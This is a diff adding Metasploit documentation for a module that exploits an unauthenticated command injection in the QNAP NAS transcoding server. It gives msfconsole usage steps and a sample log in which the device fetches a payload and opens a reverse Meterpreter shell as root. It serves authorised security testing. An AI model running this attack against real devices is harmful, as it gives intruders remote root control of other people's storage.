|
| 1 | +## Description |
| 2 | + |
| 3 | + This module exploits an unauthenticated remote command injection vulnerability in QNAP NAS devices. The transcoding server listens on port 9251 by default and is vulnerable to command injection using the 'rmfile' command. |
| 4 | + |
| 5 | + |
| 6 | +## Vulnerable Application |
| 7 | + |
| 8 | + [QNAP](https://www.qnap.com/) designs and delivers high-quality network attached storage (NAS) and professional network video recorder (NVR) solutions to users from home, SOHO to small, medium businesses. |
| 9 | + |
| 10 | + This module was tested successfully on a QNAP TS-431 with firmware version 4.3.3.0262 (20170727). |
| 11 | + |
| 12 | + |
| 13 | +## Verification Steps |
| 14 | + |
| 15 | + 1. Start `msfconsole` |
| 16 | + 2. Do: `use exploit/linux/misc/qnap_transcode_server` |
| 17 | + 3. Do: `set RHOST [IP]` |
| 18 | + 4. Do: `set LHOST [IP]` |
| 19 | + 5. Do: `run` |
| 20 | + 6. You should get a session |
| 21 | + |
| 22 | + |
| 23 | +## Options |
| 24 | + |
| 25 | + **Delay** |
| 26 | + |
| 27 | + How long to wait (in seconds) for the device to download the payload. |
| 28 | + |
| 29 | + |
| 30 | +## Scenarios |
| 31 | + |
| 32 | + ``` |
| 33 | + msf > use exploit/linux/misc/qnap_transcode_server |
| 34 | + msf exploit(qnap_transcode_server) > set rhost 10.1.1.123 |
| 35 | + rhost => 10.1.1.123 |
| 36 | + msf exploit(qnap_transcode_server) > check |
| 37 | + [*] 10.1.1.123:9251 The target service is running, but could not be validated. |
| 38 | + msf exploit(qnap_transcode_server) > set lhost 10.1.1.197 |
| 39 | + lhost => 10.1.1.197 |
| 40 | + msf exploit(qnap_transcode_server) > run |
| 41 | +
|
| 42 | + [*] Started reverse TCP handler on 10.1.1.197:4444 |
| 43 | + [*] 10.1.1.123:9251 - Using URL: http://0.0.0.0:8080/IQrgbm |
| 44 | + [*] 10.1.1.123:9251 - Local IP: http://10.1.1.197:8080/IQrgbm |
| 45 | + [*] 10.1.1.123:9251 - Sent command successfully (52 bytes) |
| 46 | + [*] 10.1.1.123:9251 - Waiting for the device to download the payload (30 seconds)... |
| 47 | + [*] 10.1.1.123:9251 - Sent command successfully (22 bytes) |
| 48 | + [*] 10.1.1.123:9251 - Sent command successfully (13 bytes) |
| 49 | + [*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.123:53888) at 2017-08-13 05:05:18 -0400 |
| 50 | + [*] 10.1.1.123:9251 - Sent command successfully (19 bytes) |
| 51 | + [*] 10.1.1.123:9251 - Command Stager progress - 100.00% done (109/109 bytes) |
| 52 | + [*] 10.1.1.123:9251 - Server stopped. |
| 53 | +
|
| 54 | + meterpreter > getuid |
| 55 | + Server username: uid=0, gid=0, euid=0, egid=0 |
| 56 | + meterpreter > sysinfo |
| 57 | + Computer : 10.1.1.123 |
| 58 | + OS : (Linux 3.2.26) |
| 59 | + Architecture : armv7l |
| 60 | + Meterpreter : armle/linux |
| 61 | + ``` |
| 62 | + |
0 commit comments